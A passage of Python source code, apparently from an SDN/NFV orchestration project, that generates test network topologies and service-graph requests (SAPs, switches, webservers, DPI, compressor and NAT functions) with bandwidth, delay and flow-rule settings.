nffg.add_undirected_link(nc2.add_port(), decomp.add_port(1), dynamic=True)
nffg.add_undirected_link(nc2.add_port(), decomp.add_port(2), dynamic=True)
nc1.ports[1].add_flowrule(match="in_port=1;TAG=sap1-comp-139956882597136",
action="output=%s;UNTAG" % nc1.ports.container[
-1].id)
nc2.ports[2].add_flowrule(match="in_port=2;UNTAG",
action="output=%s;TAG=sap1-comp-139956882597136" %
nc2.ports.container[-1].id)
p1 = nc1.ports.container[-1].id
# nc1.ports[p1].add_flowrule(match="in_port=%s;TAG=comp-sap1-%s" % (p1, 42),
# action="output=%s;UNTAG" % 1)
nc1.ports[p1].add_flowrule(match="in_port=%s;" % p1,
action="output=%s;TAG=comp-sap1-%s" % (1, 42))
p2 = nc2.ports.container[-1].id
nc2.ports[p2].add_flowrule(match="in_port=%s;TAG=comp-sap1-%s" % (p2, 42),
action="output=%s;" % 1)
return nffg
def generate_sdn_topo ():
# Create NFFG
nffg = NFFG(id="SDN", name="SDN-Topology")
# Add MikroTik OF switches
mt1 = nffg.add_infra(id="MT1", name="MikroTik-SW-1", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt2 = nffg.add_infra(id="MT2", name="MikroTik-SW-2", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt1.resources.delay = 0.2
mt1.resources.bandwidth = 4000
mt2.resources.delay = 0.2
mt2.resources.bandwidth = 4000
# Add SAPs
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap24 = nffg.add_sap(id="SAP24", name="SAP24")
sap34 = nffg.add_sap(id="SAP34", name="SAP34")
# Add links
l1 = nffg.add_link(mt1.add_port(1), mt2.add_port(1), id="sdn-link1")
l2 = nffg.add_link(sap14.add_port(1), mt1.add_port(2), id="sdn-link2")
mt1.add_port(3)
mt1.add_port(4)
l3 = nffg.add_link(mt2.add_port(2), sap24.add_port(1), id="sdn-link3")
l4 = nffg.add_link(mt2.add_port(3), sap34.add_port(1), id="sdn-link4")
mt2.add_port(4)
l1.delay = 0.1
l1.bandwidth = 1000
l2.delay = 1.5
l2.bandwidth = 1000
l3.delay = 1.5
l3.bandwidth = 1000
l4.delay = 1.5
l4.bandwidth = 1000
return nffg
def generate_sdn_topo2 ():
# Create NFFG
nffg = NFFG(id="SDN", name="SDN-Topology")
# Add MikroTik OF switches
mt1 = nffg.add_infra(id="MT1", name="MikroTik-SW-1", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt1.resources.delay = 0.2
mt1.resources.bandwidth = 4000
# Add SAPs
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap24 = nffg.add_sap(id="SAP24", name="SAP24")
sap34 = nffg.add_sap(id="SAP34", name="SAP34")
# Add links
l1 = nffg.add_link(sap14.add_port(1), mt1.add_port(1), id="sdn-link1")
l2 = nffg.add_link(sap24.add_port(1), mt1.add_port(2), id="sdn-link2")
l3 = nffg.add_link(sap34.add_port(1), mt1.add_port(3), id="sdn-link3")
l1.delay = 0.1
l1.bandwidth = 1000
l2.delay = 1.5
l2.bandwidth = 1000
l3.delay = 1.5
l3.bandwidth = 1000
return nffg
def generate_sdn_req ():
# Create NFFG
nffg = NFFG(id="SDN", name="SDN-Topology")
# Add SAPs
sap14 = nffg.add_sap(id="SAP14", name="SAP14")
sap24 = nffg.add_sap(id="SAP24", name="SAP24")
# sap34 = nffg.add_sap(id="SAP34", name="SAP34")
sap14.add_port(1)
sap24.add_port(1)
# sap34.add_port(1)
nffg.add_sglink(sap14.ports[1], sap24.ports[1], id=1)
# nffg.add_sglink(sap14.ports[1], sap34.ports[1])
# nffg.add_sglink(sap24.ports[1], sap14.ports[1])
# nffg.add_sglink(sap34.ports[1], sap14.ports[1])
nffg.add_req(sap14.ports[1], sap24.ports[1], bandwidth=10, delay=100, id=2)
# nffg.add_req(sap14.ports[1], sap34.ports[1], bandwidth=10, delay=100)
# nffg.add_req(sap24.ports[1], sap14.ports[1], bandwidth=10, delay=100)
# nffg.add_req(sap34.ports[1], sap14.ports[1], bandwidth=10, delay=100)
return nffg
def generate_os_req ():
test = NFFG(id="OS-req", name="SG-name")
sap1 = test.add_sap(name="SAP24", id="0")
sap2 = test.add_sap(name="SAP42", id="1")
webserver = test.add_nf(id="webserver", name="webserver",
func_type="webserver", cpu=1, mem=1, storage=0)
# echo = test.add_nf(id="echo", name="echo", func_type="echo",
# cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(0), webserver.add_port(0), id=1)
test.add_sglink(webserver.ports[0], sap2.add_port(0), id=2)
# test.add_req(sap1.ports[0], webserver.ports[0], bandwidth=1, delay=20)
# test.add_req(webserver.ports[0], sap2.ports[0], bandwidth=1, delay=20)
test.add_req(sap1.ports[0], sap2.ports[0], bandwidth=1, delay=100)
return test
def generate_os_mn_req ():
test = NFFG(id="OS-MN-req", name="SG-name")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# fwd = test.add_nf(id="fwd", name="FORWARDER",
# func_type="simpleForwarder", cpu=1, mem=1, storage=0)
# sap14 = test.add_sap(name="SAP14", id="0")
# sap24 = test.add_sap(name="SAP24", id="1")
webserver = test.add_nf(id="webserver", name="webserver",
func_type="webserver", cpu=1, mem=1, storage=0)
# echo = test.add_nf(id="echo", name="echo", func_type="echo",
# cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(0), webserver.add_port(0), id=1)
test.add_sglink(webserver.ports[0], sap2.add_port(0), id=2)
# test.add_req(sap1.ports[0], webserver.ports[0], bandwidth=1, delay=20)
# test.add_req(webserver.ports[0], sap2.ports[0], bandwidth=1, delay=20)
test.add_req(sap1.ports[0], sap2.ports[0], bandwidth=1, delay=100)
return test
def generate_dov ():
# Create NFFG
nffg = NFFG(id="INTERNAL", name="SIGCOMM")
# Add environments
ee1 = nffg.add_infra(id="EE1", name="ee-infra-1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
ee2 = nffg.add_infra(id="EE2", name="ee-infra-2", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
# Add supported types
ee1.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
ee2.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder'))
# Add OVS switches
sw3 = nffg.add_infra(id="SW3", name="switch-3", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
sw4 = nffg.add_infra(id="SW4", name="switch-4", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_SDN_SW, delay=0.2,
bandwidth=10000)
# Add SAPs
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(ee1.add_port(1), sw3.add_port(1), id="link1", **link_res)
nffg.add_link(ee2.add_port(1), sw4.add_port(1), id="link2", **link_res)
nffg.add_link(sw3.add_port(2), sw4.add_port(2), id="link3", **link_res)
nffg.add_link(sw3.add_port(3), sap1.add_port(1), id="link4", **link_res)
nffg.add_link(sw4.add_port(3), sap2.add_port(1), id="link5", **link_res)
# Add MikroTik OF switches
mt1 = nffg.add_infra(id="MT1", name="MikroTik-SW-1", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt2 = nffg.add_infra(id="MT2", name="MikroTik-SW-2", domain=DOMAIN_SDN,
infra_type=NFFG.TYPE_INFRA_SDN_SW)
mt1.resources.delay = 0.2
mt1.resources.bandwidth = 4000
mt2.resources.delay = 0.2
mt2.resources.bandwidth = 4000
# Add links
l11 = nffg.add_link(mt1.add_port(1), mt2.add_port(1), id="link11")
l12 = nffg.add_link(sw4.add_port(4), mt1.add_port(2), id="link12")
mt1.add_port(3)
mt1.add_port(4)
mt2.add_port(4)
l11.delay = 0.1
l11.bandwidth = 1000
l12.delay = 1.5
l12.bandwidth = 1000
os_bb = nffg.add_infra(id="UUID-01", name="Single BiSBiS in OS Domain",
domain="OPENSTACK",
infra_type=NFFG.TYPE_INFRA_BISBIS, cpu=10, mem=32,
storage=5, delay=0, bandwidth=100000)
# Add supported types
os_bb.add_supported_type(('webserver', 'echo'))
l21 = nffg.add_link(mt2.add_port(2), os_bb.add_port(0), id="link21")
l21.delay = 10
l21.bandwidth = 1000
un_bb = nffg.add_infra(id="UUID11", name="Universal Node",
domain="UN",
infra_type=NFFG.TYPE_INFRA_BISBIS, cpu=5, mem=16,
storage=5, delay=0, bandwidth=100000)
# Add supported types
un_bb.add_supported_type(('dpi', 'example'))
l31 = nffg.add_link(mt2.add_port(3), un_bb.add_port(1), id="link31")
l31.delay = 10
l31.bandwidth = 1000
nffg.duplicate_static_links()
return nffg
def generate_global_req ():
test = NFFG(id="SIGCOMM-demo-req", name="SIGCOMM-2web-1dpi-2SAP-req")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# fwd = test.add_nf(id="fwd", name="FORWARDER",
# func_type="simpleForwarder", cpu=1, mem=1, storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
webserver2 = test.add_nf(id="webserver2", name="webserver2",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id='11')
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id='12')
test.add_sglink(dpi.add_port(2), sap1.ports[1], id='13')
test.add_sglink(sap2.add_port(1), webserver2.add_port(0), id='21')
test.add_sglink(webserver2.ports[0], sap2.ports[1], id='22')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=('11', '12', '13'))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=('21', '22'))
return test
def generate_ewsdn_req1 ():
test = NFFG(id="EWSDN-demo-req1", name="EWSDN-2web-2SAP-req")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
webserver2 = test.add_nf(id="webserver2", name="webserver2",
func_type="webserver", cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id='11')
test.add_sglink(webserver1.ports[0], sap1.ports[1], id='12')
test.add_sglink(sap2.add_port(1), webserver2.add_port(0), id='21')
test.add_sglink(webserver2.ports[0], sap2.ports[1], id='22')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=('11', '12'))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=('21', '22'))
return test
def generate_ewsdn_req2 ():
test = NFFG(id="EWSDN-demo-req2", name="EWSDN-2web-1dpi-2SAP-req")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
# comp = test.add_nf(id="comp", name="COMPRESSOR",
# func_type="headerCompressor",
# cpu=1, mem=1, storage=0)
# decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
# func_type="headerDecompressor", cpu=1, mem=1,
# storage=0)
# fwd = test.add_nf(id="fwd", name="FORWARDER",
# func_type="simpleForwarder", cpu=1, mem=1, storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
webserver2 = test.add_nf(id="webserver2", name="webserver2",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id='11')
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id='12')
test.add_sglink(dpi.add_port(2), sap1.ports[1], id='13')
test.add_sglink(sap2.add_port(1), webserver2.add_port(0), id='21')
test.add_sglink(webserver2.ports[0], sap2.ports[1], id='22')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=('11', '12', '13'))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=('21', '22'))
return test
def generate_ewsdn_req3 ():
test = NFFG(id="EWSDN-demo-req3",
name="EWSDN-2web-1dpi-1comp-1decomp-2SAP-req")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
webserver2 = test.add_nf(id="webserver2", name="webserver2",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id='11')
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id='12')
test.add_sglink(dpi.add_port(2), comp.add_port(1), id='13')
test.add_sglink(comp.ports[1], decomp.add_port(1), id='14')
test.add_sglink(decomp.ports[1], sap1.ports[1], id='15')
test.add_sglink(sap2.add_port(1), webserver2.add_port(0), id='21')
test.add_sglink(webserver2.ports[0], sap2.ports[1], id='22')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=('11', '12', '13', '14', '15'))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=('21', '22'))
return test
def test_conversion ():
from escape.util.conversion import NFFGConverter
with open("/home/czentye/escape/src/escape_v2/tools/os_domain.xml") as f:
os_nffg, os_virt = NFFGConverter(
domain="OPENSTACK").parse_from_Virtualizer(f.read(), with_virt=True)
with open("/home/czentye/escape/src/escape_v2/tools/un_domain.xml") as f:
un_nffg, un_virt = NFFGConverter(
domain="UN").parse_from_Virtualizer(f.read(), with_virt=True)
with open("/home/czentye/escape/src/escape_v2/pox/escape-mn-topo.nffg") as f:
internal = NFFG.parse(f.read())
internal.duplicate_static_links()
# print
# pprint(os_nffg.network.__dict__)
# print
# pprint(un_nffg.network.__dict__)
# print
# pprint(internal.network.__dict__)
merged = NFFGToolBox.merge_new_domain(internal, os_nffg)
merged = NFFGToolBox.merge_new_domain(merged, un_nffg)
# pprint(merged.network.__dict__)
print
splitted = NFFGToolBox.split_into_domains(merged)
print splitted
# for d, p in splitted:
# print "\n", d
# print p.dump()
os_virt.nodes['UUID-01'].clearData()
os_virt.nodes['UUID-01'].flowtable.clearData()
print
print str(os_virt)
os_splitted = [n for d, n in splitted if d == "OPENSTACK"][0]
os_splitted['UUID-01'].domain = "UN"
os_splitted['UUID-01'].ports[0].add_flowrule(match="in_port=0;TAG=42",
action="output=3;UNTAG")
os_splitted['UUID-01'].ports[2].add_flowrule(match="in_port=2;UNTAG",
action="output=1;TAG=24")
print os_splitted.dump()
def generate_merged_mapped ():
with open("/home/czentye/escape/src/escape_v2/pox/merged-global.nffg") as f:
nffg = NFFG.parse(f.read())
nffg.id = "test-mapped-web-dpi"
nffg.name = "Test-NFFG"
nf_dpi = nffg.add_nf(id="dpi", name="DPI", func_type="dpi")
nf_web = nffg.add_nf(id="webserver", name="Webserver", func_type="webserver")
nffg.add_undirected_link(port1=nf_dpi.add_port(1),
port2=nffg['UUID11'].add_port(111), dynamic=True)
nffg.add_undirected_link(port1=nf_dpi.add_port(2),
port2=nffg['UUID11'].add_port(222), dynamic=True)
nffg.add_undirected_link(port1=nf_web.add_port(0),
port2=nffg['UUID-01'].add_port(100), dynamic=True)
nffg.add_undirected_link(port1=nf_web.add_port(1),
port2=nffg['UUID-01'].add_port(111), dynamic=True)
# UN domain flowrules
nffg['UUID11'].ports[1].add_flowrule("in_port=1;TAG=4242", "output=111;UNTAG")
nffg['UUID11'].ports[222].add_flowrule("in_port=222", "output=1;TAG=2424")
# OS domain flowrules
nffg['UUID-01'].ports[0].add_flowrule("in_port=0;TAG=1313",
"output=100;UNTAG")
nffg['UUID-01'].ports[111].add_flowrule("in_port=111", "output=0;TAG=3131")
return nffg.dump()
def generate_simple_test_topo ():
# Create NFFG
nffg = NFFG(id="TEST", name="Simple-Test-Topology")
# Add environments
ee1 = nffg.add_infra(id="EE1", name="ee-infra-1", domain=DOMAIN_INTERNAL,
infra_type=NFFG.TYPE_INFRA_EE, cpu=5, mem=5, storage=5,
delay=0.9, bandwidth=5000)
# Add supported types
ee1.add_supported_type(
('headerCompressor', 'headerDecompressor', 'simpleForwarder', 'ovs'))
# Add SAPs
sap1 = nffg.add_sap(id="SAP1", name="SAP1")
sap2 = nffg.add_sap(id="SAP2", name="SAP2")
# Add links
link_res = {'delay': 1.5, 'bandwidth': 10}
nffg.add_link(sap1.add_port(1), ee1.add_port(1), id="mn-link1", **link_res)
nffg.add_link(sap2.add_port(1), ee1.add_port(2), id="mn-link2", **link_res)
# nffg.duplicate_static_links()
return nffg
def generate_simple_test_req ():
test = NFFG(id="Simple-test-req", name="Simple test request")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
ovs = test.add_nf(id="ovs", name="OVS switch", func_type="ovs",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), ovs.add_port(1), id=1)
test.add_sglink(ovs.ports[1], sap2.add_port(1), id=2)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=1, delay=10,
sg_path=(1, 2))
return test
def generate_hwloc2nffg_test_req ():
test = NFFG(id="Dataplane-req", name="Dataplane-req")
wlan0 = test.add_sap(name="wlan0", id="wlan0")
eth0 = test.add_sap(name="eth0", id="eth0")
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
# wlan0 --> decomp --> eth0 --> wlan0
test.add_sglink(wlan0.add_port(38), decomp.add_port(1), id=1)
test.add_sglink(decomp.ports[1], eth0.add_port(34), id=2)
test.add_sglink(eth0.ports[34], wlan0.ports[38], id=3)
test.add_req(wlan0.ports[38], eth0.ports[34], bandwidth=50, delay=100,
sg_path=(1, 2))
test.add_req(eth0.ports[34], wlan0.ports[38], bandwidth=50, delay=100,
sg_path=(3,))
return test
def generate_5gex_req0 ():
test = NFFG(id="SG-1", name="SG-name1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
test.add_sglink(sap1.add_port(1), sap2.add_port(1), id=1)
test.add_sglink(sap1.ports[1], sap2.ports[1], id=2)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2))
return test
def generate_5gex_req1 ():
test = NFFG(id="SG-1", name="SG-name1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
bridge = test.add_nf(id="bridge", name="BRIDGE", func_type="bridge",
cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), bridge.add_port(1), id=1)
test.add_sglink(bridge.add_port(2), sap2.add_port(1), id=2)
test.add_sglink(sap2.ports[1], fwd.add_port(1), id=3)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=4)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2))
test.add_req(sap2.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(3, 4))
return test
def generate_5gex_req2 ():
test = NFFG(id="SG-2", name="SG-name2")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR", func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1, storage=0)
fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), comp.add_port(1), id=1)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=2)
test.add_sglink(decomp.ports[1], sap2.add_port(1), id=3)
test.add_sglink(sap2.ports[1], fwd.add_port(1), id=4)
test.add_sglink(fwd.ports[1], sap1.ports[1], id=5)
test.add_req(sap1.ports[1], sap2.ports[1], bandwidth=4, delay=20,
sg_path=(1, 2, 3))
test.add_req(sap2.ports[1], sap1.ports[1], bandwidth=4, delay=20,
sg_path=(4, 5))
return test
def generate_req_verification ():
test = NFFG(id="verification-2sap-web-fw-dpi-nat",
name="verification-2sap-web-fw-dpi-nat")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
sap3 = test.add_sap(name="SAP3", id="sap3")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
nat = test.add_nf(id="nat", name="NAT", func_type="nat",
cpu=1, mem=1, storage=0)
fw = test.add_nf(id="fw", name="FIREWALL", func_type="firewall",
cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi",
cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), nat.add_port(1), id=11)
test.add_sglink(nat.add_port(2), webserver1.add_port(1), id=12)
test.add_sglink(webserver1.ports[1], fw.add_port(1), id=13,
flowclass='dl_type=0x0800,nw_dst=172.16.58.3')
test.add_sglink(fw.add_port(2), nat.ports[2], id=14)
test.add_sglink(nat.ports[1], sap1.ports[1], id=15,
flowclass='dl_type=0x0800,nw_dst=10.0.0.1')
test.add_sglink(sap2.add_port(1), nat.ports[1], id=21)
test.add_sglink(nat.ports[1], dpi.add_port(1), id=25,
flowclass='dl_type=0x0800,nw_dst=10.0.0.2')
test.add_sglink(dpi.add_port(2), sap2.ports[1], id=26)
test.add_sglink(sap3.add_port(1), webserver1.ports[1], id=31)
test.add_sglink(webserver1.ports[1], sap3.ports[1], id=32,
flowclass='dl_type=0x0800,nw_dst=192.168.3.11')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req1a ():
test = NFFG(id="ETSI-1sap-web", name="ETSI-1sap-web")
sap1 = test.add_sap(name="SAP1", id="SAP1")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], sap1.ports[1], id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12))
return test
def generate_etsi_req1b ():
test = NFFG(id="ETSI-2sap-web", name="ETSI-2sap-web")
sap1 = test.add_sap(name="SAP1", id="SAP1")
sap2 = test.add_sap(name="SAP2", id="SAP2")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], sap1.ports[1], id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12))
return test
def generate_etsi_req2a ():
test = NFFG(id="ETSI-1sap-web-dpi", name="ETSI-1sap-web-dpi")
sap1 = test.add_sap(name="SAP1", id="SAP1")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), sap1.ports[1], id=13)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13))
return test
def generate_etsi_req2b ():
test = NFFG(id="ETSI-2sap-web-dpi", name="ETSI-2sap-web-dpi")
sap1 = test.add_sap(name="SAP1", id="SAP1")
sap2 = test.add_sap(name="SAP2", id="SAP2")
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
# fwd = test.add_nf(id="fwd", name="FORWARDER", func_type="simpleForwarder",
# cpu=1, mem=1, storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), sap1.ports[1], id=13)
# test.add_sglink(sap2.add_port(1), fwd.add_port(1), id=21)
# test.add_sglink(fwd.ports[1], webserver1.ports[0], id=22)
# test.add_sglink(webserver1.ports[0], sap2.ports[1], id=23,
# flowclass='dl_dst=00:00:00:00:00:02')
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], sap2.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13))
test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
sg_path=(21, 22))
return test
def generate_etsi_req3a ():
test = NFFG(id="ETSI-1sap-web-dpi-comp-decomp",
name="ETSI-1sap-web-dpi-comp-decomp")
sap1 = test.add_sap(name="SAP1", id="sap1")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), comp.add_port(1), id=13)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=14)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=15)
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15))
return test
def generate_etsi_req3b ():
test = NFFG(id="ETSI-2sap-web-dpi-comp-decomp",
name="ETSI-2sap-web-dpi-comp-decomp")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
comp = test.add_nf(id="comp", name="COMPRESSOR",
func_type="headerCompressor",
cpu=1, mem=1, storage=0)
decomp = test.add_nf(id="decomp", name="DECOMPRESSOR",
func_type="headerDecompressor", cpu=1, mem=1,
storage=0)
webserver1 = test.add_nf(id="webserver1", name="webserver1",
func_type="webserver", cpu=1, mem=1, storage=0)
dpi = test.add_nf(id="dpi", name="DPI", func_type="dpi", cpu=1, mem=1,
storage=0)
test.add_sglink(sap1.add_port(1), webserver1.add_port(0), id=11)
test.add_sglink(webserver1.ports[0], dpi.add_port(1), id=12,
flowclass='dl_dst=00:00:00:00:00:01')
test.add_sglink(dpi.add_port(2), comp.add_port(1), id=13)
test.add_sglink(comp.ports[1], decomp.add_port(1), id=14)
test.add_sglink(decomp.ports[1], sap1.ports[1], id=15,
flowclass='dl_type=0x0800,nw_dst=10.0.0.1')
test.add_sglink(sap2.add_port(1), webserver1.ports[0], id=21)
test.add_sglink(webserver1.ports[0], comp.ports[1], id=22,
flowclass='dl_dst=00:00:00:00:00:02')
test.add_sglink(decomp.ports[1], sap2.ports[1], id=23,
flowclass='dl_type=0x0800,nw_dst=10.0.0.2')
test.add_req(sap1.ports[1], sap1.ports[1], bandwidth=1, delay=100,
sg_path=(11, 12, 13, 14, 15))
# test.add_req(sap2.ports[1], sap2.ports[1], bandwidth=1, delay=100,
# sg_path=(21, 22, 14, 23))
return test
def generate_etsi_req3b2 ():
test = NFFG(id="ETSI-2sap-web-dpi-comp-decomp-onlysap1",
name="ETSI-2sap-web-dpi-comp-decomp-onlysap1")
sap1 = test.add_sap(name="SAP1", id="sap1")
sap2 = test.add_sap(name="SAP2", id="sap2")
